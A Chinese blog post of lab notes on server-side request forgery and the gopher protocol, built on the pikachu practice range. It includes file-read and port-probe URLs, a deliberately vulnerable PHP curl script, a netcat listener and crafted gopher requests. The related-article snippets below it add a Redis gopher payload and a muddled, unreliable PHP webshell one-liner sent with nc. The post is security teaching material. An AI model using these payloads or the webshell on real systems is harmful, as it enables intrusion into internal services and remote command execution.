SSRF学习-gopher协议学习

最新推荐文章于 2024-12-29 22:48:32 发布
最新推荐文章于 2024-12-29 22:48:32 发布
阅读量621 收藏 2
点赞数 1
分类专栏: 网络安全学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_39504221/article/details/111773623
版权

ssrf是攻击者伪造服务器端发起请求的漏洞

  • 读取服务器内部文件
  • 端口扫描
  • 攻击脆弱的内网应用

pikachu靶场

curl_exec()

使用此函数前提

  • PHP版本>=5.3
  • 开启extension=php_curl.dll

0x01 读文件

http://localhost/pikachu/vul/ssrf/ssrf_curl.php?url=file://c:/test.txt

在这里插入图片描述

0x02 探测主机端口信息

http://localhost/pikachu/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1:3306/info

在这里插入图片描述

http://localhost/pikachu/vul/ssrf/ssrf_curl.php?url=dict://127.0.0.1:3306/info

在这里插入图片描述
在cmd输入curl --version可查看curl支持的协议
在这里插入图片描述

file_get_content

使用此函数前提

  • php.ini的allow_url_fopen设置为ON

读文件
在这里插入图片描述

php伪协议读文件

在这里插入图片描述
读取以base64加密后的test.txt

http://localhost/pikachu/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=c://test.txt

在这里插入图片描述

gopher协议

实验
前提:curl支持gopher协议
在这里插入图片描述

win7(漏洞)192.168.254.132
kali(攻击)192.168.254.128

漏洞代码

<?php
$ch = curl_init(); // 创建一个新cURL资源
curl_setopt($ch, CURLOPT_URL, $_GET['url']); // 设置URL和相应的选项
#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
curl_exec($ch); // 抓取URL并把它传递给浏览器
curl_close($ch); // 关闭cURL资源,并且释放系统资源
?>

使用phpstudy搭建环境
测试环境是否搭建成功
在这里插入图片描述
0x01 kali监听1234端口

nc -lvvp 1234

在这里插入图片描述
0x02 利用gopher协议向kali发送数据
在这里插入图片描述
kali接收到数据

gopher发送get请求

win7上的源码

<?php
	echo $_GET['a'];
?>

最简单的get请求

GET /test.php?a=hello HTTP/1.1
Host:192.168.254.132

url编码
(注意如果使用类似burpsuite等工具进行url编码的话,回车可能会编码成%0a,而我们要将其编码成%0d%0a才行)

GET%20/test.php?a=hello%20HTTP/1.1%0d%0aHost:192.168.254.132%0d%0a

然后用curl发送请求

curl gopher://192.168.254.132:80/_GET%20/test.php?a=hello%20HTTP/1.1%0d%0aHost:192.168.254.132%0d%0a

在这里插入图片描述

gopher发送post请求

win7上的源码

<?php
	echo $_POST['a'];
?>

最简单的post请求报文

POST /test.php HTTP/1.1
host:192.168.254.132
Content-Type:application/x-www-form-urlencoded
Content-Length:11

a=hello

将其url编码

POST%20/test.php%20HTTP/1.1%0d%0ahost:192.168.254.132%0d%0aContent-Type:application/x-www-form-urlencoded%0d%0aContent-Length:11%0d%0a%0d%0aa=hello%0d%0a

在这里插入图片描述

SSRF中phar协议gopher协议的利用
weixin_44687621的博客
09-07 1087
我们在学习SSRF漏洞的时候,经常会只关注file协议等,因为利用方式简单。实际上随着php版本的提升和编程技术的规范,能够直接利用的漏洞越来越少了,所以学习使用phar和gopher协议是很有必要的。 phar协议 在php中反序列漏洞,形成的原因首先需要一个unserialize()函数来处理我们传入的可控的序列化payload。但是如果对unserialize()传入的内容进行限制,甚至就不存在可利用的unserialize()函数的时候,就可以借助phar协议触发反序列化操作了 phar流包装器不能
SSRF利用协议中的万金油——Gopher
qq_57172130的博客
08-07 8398
使用gopher协议进一步利用ssrf
SSRF利用 Gopher 协议拓展攻击面
热门推荐
BerL1n
11-25 1万+
1 概述 Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。 gophergopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是s...
SSRF服务端请求&Gopher协议&白盒测试
最新发布
2301_81155391的博客
12-29 1110
是什么SSRF?这个简单点说就是 服务端的请求伪造 就是这个如果是个 请求图片的网站 他的目的是请求外部其他网站的 图片 但是 SSRF指的是让他请求本地的图片 再展示出来 请求的是他的服务器上的图片SSRF(Server-Side Request Forgery:服务器端请求伪造)一种由攻击者构造形成由服务端发起请求的一个安全漏洞;一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
SSRF-gopher 协议扩展利用:突破网络限制的利器
weixin_43822401的博客
06-11 885
Gopher 是一种在 HTTP 协议之前非常流行的信息查找系统,虽然现在已经被 HTTP 协议取代,但在 SSRF 漏洞利用中仍然发挥着重要作用。Gopher 协议可以将 HTTP 请求转换为 TCP 数据流,从而突破一些网络限制,例如防火墙。Gopher 协议作为 SSRF 漏洞利用的利器,可以帮助攻击者突破网络限制,实现更高级的攻击目标。为了防止 SSRF-gopher 协议漏洞,需要对用户输入进行严格的校验,并使用安全的编码和解码库。
SSRF学习(4)Gopher协议POST请求
m0_64417923的博客
05-13 1300
和前两题一样,先使用file:///协议 http://127.0.0.1/flag.php 得到一个输入框 右键查看源代码: 得到key key=f80bb4e68df72b3f98569b958219be05 所以应该是通过key进入,从而得到flag,但是没有提交的按钮,所以我们要自己构造post请求,将这个key发送过去。 用gopher协议构造post请求: <?php ​ error_reporting(0); ​ if ($_SERVER["REM...
CTFHUB-SSRF-Redis协议
qq_62078839的博客
04-23 2152
利用工具gopherus来生成payload 这里我们进行第二次url编码时,不需要再将%0a换为%0d%0a了,因为生成的payload已经替换了 gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250...
SSRF学习(5)gopher协议上传文件
m0_64417923的博客
05-14 746
题目:这次需要上传一个文件到flag.php了.祝你好运 首先从目标机本地访问flag.php: url=http://127.0.0.1/flag.php 得到一个文件上传的界面,需要上传一个Webshell。再查看源代码: /?url=file:///var/www/html/flag.php <?php ​ error_reporting(0); ​ if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){ echo "...
ssrf中gopher协议的利用
V
10-29 5698
SSRF漏洞如何产生 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击 者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是 能够直接对目标网站的内部系统发起请求。(因为他是从内部系统访 问的,所以可以通过它攻击外网无法访问的内部系统,也就是把目标 网站当中间人) gopher协议的利用 gopher 协议 Gopher是Internet...
2021-03-22-ssrf-lab
qq_50963064的博客
11-15 1929
ssrf简介 SSRF(Server-Side Request Forgery),即服务器端请求伪造,利用漏洞伪造服务器端发起请求,从而突破客户端获取不到数据限制,本质上是属于信息泄露漏洞。 ssrf漏洞原理: ssrf形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等,而且大部分的 web服务器架构中,web服务器自身是可以访问互联网和服务器所在的内网的,所以攻击者可以传入任意的地址来让后端服务器对
gopher-php:一个用于 PHP 的 GOPHER 取和解析库
07-01
地鼠-php gopher-php 是一个库,可让您从 PHP 取和解析 Gopher 文件。 这是我编写的一个库,目的是通过 Gopher 文件编写博客,但可以通过 HTTP 访问博客。 由于此库是为满足我自己的特定需求而编写的,因此就 Gopher 支持而言,它的功能并不完整。 当前支持的 Gopher 项目类型有: 指向文本文件的链接(类型 0) 目录链接(类型 1) HTTP URL(类型 h,Gophernicus) 信息线(类型 i,Gophernicus) 纯文本项目 有一些类可以处理 Gopher 本身以及“phlogs”,即通过 Gopher 编写和提供的博客。 格式基于我使用的 phlog 系统。 更多信息如下。 用法 地鼠 为了取和解析 Gopher 文件,只需实例化一个新的GopherFile对象,传入文件名。 这将使用一组GopherItem对象
gopher协议ssrf
UserNick157的博客
08-24 1268
gopher curl ssrf
SSRF一—WEB攻防-SSRF服务端请求&Gopher协议&无回显利用&黑白盒挖掘&业务功能点
zyw268的博客
03-25 404
黑盒WEB-业务功能&URL关键字。SSRF-原理&挖掘&利用&修复。白盒CTF-绕过&伪协议&审计点。
SSRF漏洞中使用到的其他协议
qq_43665434的博客
04-04 1459
清明时节雨纷纷,路上行人欲断魂。 1、dict协议 定义:词典网络协议,在RFC 2009中进行描述。他的目标是超越Webster protocol,并允许客户端在使用过程中访问更多字典。Dict服务器和客户机使用TCP端口2628。 dict协议SSRF漏洞中的使用 gopher协议的使用需要满足的条件: 协议 支持情况 PHP –wite-curlwrappers且php版本至少为5.3 Java 小于JDK1.7 Curl 低版本不支持 Perl 支持 ASP.
SSRF攻击与Gopher协议
RuiLike的博客
06-04 2358
Gopher定义Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;gopher支持发出GET、POST请求。
SSRF+gopher协议渗透struts2
qq_43665434的博客
03-29 727
SSRF+gopher协议渗透struts2 实验主机 windows10 192.168.1.120 #SSFR漏洞主机 centos8搭建struts2-045环境 192.168.1.106 实验环境 SSRF漏洞代码curl_exec.php: php版本>5.3才可使用gopher协议 可用var_dump(curl_version())来调试 #win10主机 curl_exec.php <?php $url = $_GET['url']; #var_d
关于gopher协议ssrf攻击
qq_69775412的博客
04-26 3398
Gopher协议浅析 Gopher协议是internet的一个信息查找系统,俗称万能协议,可以通过gopher访问对应计算机上的其他资源,例如利用gopher实现:GET请求,POST请求,内网的redis,mysql(以及各类关系型数据库)未授权访问,以及MongoDB,Memcache等。 协议详情 端口 默认为70端口,可以自定义 协议格式 gopher://127.0.0.1:70/_[data] “
使用gopher协议写webshell
06-06
Gopher 协议是一个老式的网络协议,它主要用于文本传输和文件下载。由于一些历史原因,Gopher 协议在一些场景下仍然有用处,例如绕过一些防火墙和安全设备。在某些情况下,可以利用 Gopher 协议来写 Webshell,从而实现远程命令执行和文件上传等功能。 下面是一个简单的 Gopher Webshell 例子: 1. 创建一个 PHP 脚本,将其编码为 base64 格式,假设文件名为 `shell.php`。 2. 将编码后的 PHP 脚本内容插入到 Gopher URL 中,形如 `gopher://hostname:port/_<base64-encoded-php-script>`。 3. 在浏览器或者 curl 等工具中访问该 Gopher URL,即可触发 PHP 脚本执行,从而实现远程命令执行和文件上传等功能。 例如,可以使用以下命令在 Linux 系统上写入一个 Gopher Webshell: ``` echo '<?php system($_GET["cmd"]) ?>' | base64 | xargs printf "GET /_%s HTTP/1.0\r\n\r\n" | nc hostname port ``` 其中,`hostname` 和 `port` 分别为目标主机和端口号,`cmd` 为远程命令执行参数。此时,访问 `gopher://hostname:port` 即可执行远程命令。 需要注意的是,使用 Gopher 协议写 Webshell 存在一些风险,容易被防火墙和安全设备识别和拦截。此外,由于 Gopher 协议已经过时,一些浏览器和工具可能不支持 Gopher URL。因此,在实际应用中,需要根据具体情况进行选择和调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值